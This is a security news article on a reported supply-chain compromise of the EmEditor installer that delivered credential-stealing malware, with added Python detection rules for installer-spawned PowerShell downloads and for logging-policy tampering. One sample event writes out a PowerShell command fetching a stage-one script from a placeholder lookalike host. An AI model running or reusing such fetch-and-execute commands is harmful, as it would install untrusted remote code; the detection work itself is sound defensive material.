A new watering hole attack is actively targeting developers who use EmEditor, a popular text editor widely adopted within Japanese programming communities. In late December 2025, the official EmEditor download page was compromised, allowing threat actors to distribute malicious versions of the software installer to unsuspecting users. This incident highlights a significant supply chain risk, where trusted software platforms can be subverted to deliver sophisticated malware designed for credential theft and data exfiltration.
The attack, detected by Trend Micro analysts, involved a trojanized installer that, once executed, deploys a multistage malware payload. The threat actors strategically timed the campaign to coincide with the year-end holidays, a period when IT security teams often operate with reduced staffing, potentially increasing the likelihood of the initial compromise going unnoticed for an extended period. Developers and organizations worldwide relying on EmEditor faced an immediate and significant risk during the undetected window.
Infection Mechanism and Stealer Malware Deployment
The compromised .MSI installer file contained modified scripts that were designed to execute without triggering immediate security alerts. Upon installation, the malicious code initiates a PowerShell command. This command reaches out to remote servers, disguised with domains mimicking legitimate EmEditor infrastructure, to retrieve the first-stage malware payload.
Trend Micro’s analysis revealed that the initial payload then downloads two further components from additional URLs. These subsequent payloads are responsible for establishing persistence on the infected system, conducting system reconnaissance, and initiating data theft operations. The attackers employed sophisticated obfuscation techniques throughout the malware’s code to evade detection by standard security solutions.
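The chain described above (installer runs a PowerShell command, which fetches a first stage from a lookalike domain, which in turn pulls further components) leaves a distinctive process lineage that defenders can hunt for. The following is an added detection example, not Trend Micro's or EmEditor's code: it runs a simple rule over Sysmon-style process-creation records (field names `ParentImage`, `Image`, `CommandLine`, `ProcessId`), flagging a PowerShell child of `msiexec.exe` that uses a download primitive, and rating any URL whose host borrows the vendor name but is not on an allow-list as high severity. The allow-list of official hosts and the sample events, including the lookalike domain, are assumptions constructed for the example and are not indicators from the campaign.

```python
import re
from urllib.parse import urlparse

# Assumed allow-list of legitimate EmEditor download hosts (assumption: confirm
# against the vendor's own advisory before deploying this rule).
OFFICIAL_HOSTS = {"emeditor.com", "www.emeditor.com"}

# Installer processes that should not normally hand off to a downloading shell.
INSTALLER_PARENTS = {"msiexec.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Common PowerShell download primitives (case-insensitive).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer|invoke-restmethod|\birm\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"`;)]+", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_lookalike(host: str) -> bool:
    """True if the host borrows the vendor name but is not an official host."""
    host = host.lower()
    if host in OFFICIAL_HOSTS:
        return False
    return "emeditor" in host.replace("-", "").replace("_", "")


def analyze_event(ev: dict):
    """Return a finding dict for one process-creation event, or None."""
    if basename(ev.get("ParentImage", "")) not in INSTALLER_PARENTS:
        return None
    if basename(ev.get("Image", "")) not in SHELLS:
        return None
    cmd = ev.get("CommandLine", "")
    reasons = []
    bad_host = False
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download primitive in installer-spawned PowerShell")
    for url in URL_RE.findall(cmd):
        host = urlparse(url).hostname or ""
        if is_lookalike(host):
            reasons.append(f"lookalike vendor host: {host}")
            bad_host = True
        elif host not in OFFICIAL_HOSTS:
            reasons.append(f"non-official host: {host}")
            bad_host = True
    if not reasons:
        return None
    severity = "high" if bad_host else "medium"
    return {"ProcessId": ev.get("ProcessId"), "severity": severity, "reasons": reasons}


def scan(events):
    """Apply analyze_event to every record and keep the findings."""
    return [f for f in (analyze_event(e) for e in events) if f]


# Constructed sample events (Sysmon Event ID 1 style fields). The domain below
# is a placeholder for the example, not an indicator from the real campaign.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"Invoke-WebRequest -Uri "
                    "'https://update.emeditor-cdn.example/stage1.ps1' -OutFile C:\\Temp\\s1.ps1\""},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-ChildItem C:\\Projects"},
    {"ProcessId": 4203, "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"Write-Host 'post-install step done'\""},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Only the first sample event is reported: it is an installer-spawned shell with a download cmdlet pointing at a host that contains the vendor name but is not on the allow-list. A legitimate post-install step with no network activity (the third event) and an interactive shell launched from Explorer produce no finding, which keeps the rule quiet on ordinary developer workstations.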
Payloads and Evasion Tactics
The second payload identified by researchers functions as a primary anti-detection mechanism. It actively works to disable PowerShell Event Tracing for Windows (ETW), a logging feature crucial for security monitoring, thereby hindering threat hunting efforts. Additionally, this payload accesses the Windows Credential Manager to extract stored user credentials, such as passwords, which are invaluable to attackers seeking to gain further access.
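Because the second payload's first job is to blind PowerShell logging, a useful defensive control is to watch the policy that enables that logging and to verify it is still in force. The following is an added example, not code from Trend Micro or EmEditor, and it does not claim to match the exact method the payload uses (the article does not detail it): it inspects Sysmon Event ID 13 (registry value set) records for writes that turn off the Group Policy values behind PowerShell script block, module and transcription logging, and separately audits a registry snapshot against the expected settings. The policy paths are the standard PowerShell policy keys; the event records and snapshot are constructed for the example.

```python
import re

# Group Policy values that keep PowerShell's own logging switched on. Sysmon
# Event ID 13 (RegistryEvent: Value Set) records writes to them.
POLICY_ROOT = r"HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell"
EXPECTED_POLICY = {
    POLICY_ROOT + r"\ScriptBlockLogging\EnableScriptBlockLogging": 1,
    POLICY_ROOT + r"\ModuleLogging\EnableModuleLogging": 1,
    POLICY_ROOT + r"\Transcription\EnableTranscripting": 1,
}
# Registry paths are case-insensitive, so index them upper-cased.
_EXPECTED_UPPER = {k.upper(): (k, v) for k, v in EXPECTED_POLICY.items()}


def parse_dword(details: str):
    """Sysmon renders DWORD values as 'DWORD (0x00000000)'; return the int or None."""
    m = re.search(r"0x([0-9A-Fa-f]+)", details or "")
    return int(m.group(1), 16) if m else None


def detect_logging_tamper(events):
    """Flag registry value-set events that weaken PowerShell logging policy."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        hit = _EXPECTED_UPPER.get(ev.get("TargetObject", "").upper())
        if hit is None:
            continue
        key, wanted = hit
        observed = parse_dword(ev.get("Details", ""))
        if observed != wanted:
            findings.append({
                "key": key, "expected": wanted, "observed": observed,
                "writer": ev.get("Image"), "ProcessId": ev.get("ProcessId"),
            })
    return findings


def audit_policy(snapshot: dict):
    """Compare a registry snapshot {path: value} against the expected policy.

    Returns {path: "ok" | "disabled" | "missing"} for every expected value.
    """
    upper = {k.upper(): v for k, v in snapshot.items()}
    report = {}
    for key, wanted in EXPECTED_POLICY.items():
        if key.upper() not in upper:
            report[key] = "missing"
        elif upper[key.upper()] != wanted:
            report[key] = "disabled"
        else:
            report[key] = "ok"
    return report


# Constructed sample telemetry: one policy write to 0 by a PowerShell process,
# one unrelated Run-key write, and one non-registry event that must be ignored.
SAMPLE_EVENTS = [
    {"EventID": 13, "ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": POLICY_ROOT + r"\ScriptBlockLogging\EnableScriptBlockLogging",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "ProcessId": 902,
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Program Files\Updater\updater.exe"},
    {"EventID": 1, "ProcessId": 4121, "Image": r"C:\Windows\System32\cmd.exe"},
]

# Constructed snapshot of a host where script block logging was turned off and
# transcription was never configured.
SAMPLE_SNAPSHOT = {
    POLICY_ROOT + r"\ScriptBlockLogging\EnableScriptBlockLogging": 0,
    POLICY_ROOT + r"\ModuleLogging\EnableModuleLogging": 1,
}

if __name__ == "__main__":
    for f in detect_logging_tamper(SAMPLE_EVENTS):
        print("TAMPER:", f)
    for key, status in audit_policy(SAMPLE_SNAPSHOT).items():
        print(f"{status:8s} {key}")
```

The tamper detector is deliberately narrow: it only fires on writes to the three policy values, so it stays quiet during normal GPO refreshes that rewrite the same values with their expected content. The audit function distinguishes "missing" from "disabled" because a value that was never set means the logging was never enforced, whereas a value of 0 on a host that should have 1 is evidence that something changed it after deployment.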
The malware also captures screenshots of the infected system, giving the attackers visual context of the user's activity to support deeper network intrusion and lateral movement. The third payload manages command-and-control (C2) communications with the attacker's infrastructure. It includes geofencing that excludes systems in specific countries from the attack, which researchers suggest may point to Russian or Commonwealth of Independent States (CIS) involvement.
A consistent campaign identifier has been observed across all communications associated with this malware. This identifier aids security researchers in tracking affected systems and coordinating industry-wide response efforts. The technical details of this supply chain attack underscore the persistent threat posed by sophisticated malware targeting developers and their essential tools.
The disclosure of this compromise by EmEditor, including an advisory posted on their webpage, marks a critical step in mitigating further infections. However, affected users who may have downloaded the malicious installer before its discovery are at risk. Organizations should remain vigilant and ensure their security protocols are robust enough to detect and respond to such advanced persistent threats.